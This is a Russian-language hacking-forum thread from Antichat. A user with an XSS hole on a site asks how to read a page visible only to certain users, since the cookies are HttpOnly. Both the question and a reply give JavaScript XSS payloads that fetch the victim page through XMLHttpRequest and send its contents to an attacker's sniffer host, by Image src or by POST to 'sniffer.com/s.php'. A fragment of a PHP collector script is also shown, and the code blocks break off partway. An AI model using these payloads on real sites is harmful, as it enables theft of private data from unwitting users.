Форум АНТИЧАТ - XSS , скачать документ, или страницу.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - XSS , скачать документ, или страницу. (https://forum.antichat.xyz/showthread.php?t=440128)

Есть сайт с xss , и там есть страница с интересным мне контентом. Она видна только конкретным пользователям. Подскажите как можно эту страницу увидеть "глазами пользователя" или скачать. Куки достать там не получится , они с флагом. Адрес страницы такого типа site.com/wow.php . На форуме находил варианты скриптов , но они не работают Этот скрипт должен отправить весь ответ , но не срабатывает.

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]var[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]XMLHttpRequest[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GET'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'//site/phpinfo.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]onreadystatechange[/COLOR][COLOR="#007700"]= function() {
    if ([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]readyState[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]) {
        if([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]200[/COLOR][COLOR="#007700"]) {
            (new[/COLOR][COLOR="#0000BB"]Image[/COLOR][COLOR="#007700"]()).[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"//%сниффер%/?"[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]responseText
[/COLOR][COLOR="#007700"]}
    }
}

[/COLOR][/COLOR]

ДУмал что проблемма в снифере , но перепробовав огромное количество , поучаю тот же результат .Пару раз получил обрезанный сильно ответ . Может нужно по особенному настроить снифер ?.

Попробуй escape(btoa(xhr.responseText))

Файл может не влезть в GET запрос по причине 414-ой ошибки. Вот что надумал:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

   var[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]XMLHttpRequest[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GET'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'http://victim.com/phpinfo.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]onreadystatechange[/COLOR][COLOR="#007700"]= function() {
  if ([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]readyState[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]) {
  if([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]200[/COLOR][COLOR="#007700"]) {
           var[/COLOR][COLOR="#0000BB"]fhr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]XMLHttpRequest[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]fhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'POST'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'http://sniffer.com/s.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]setRequestHeader[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Type'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'application/x-www-form-urlencoded'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]withCredentials[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
           var[/COLOR][COLOR="#0000BB"]body[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'file='[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]escape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]responseText[/COLOR][COLOR="#007700"]);
           var[/COLOR][COLOR="#0000BB"]aBody[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Uint8Array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]body[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]length[/COLOR][COLOR="#007700"]);
           for (var[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]
[/COLOR]
[/COLOR]

s.php:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]FILE_APPEND[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
[/COLOR]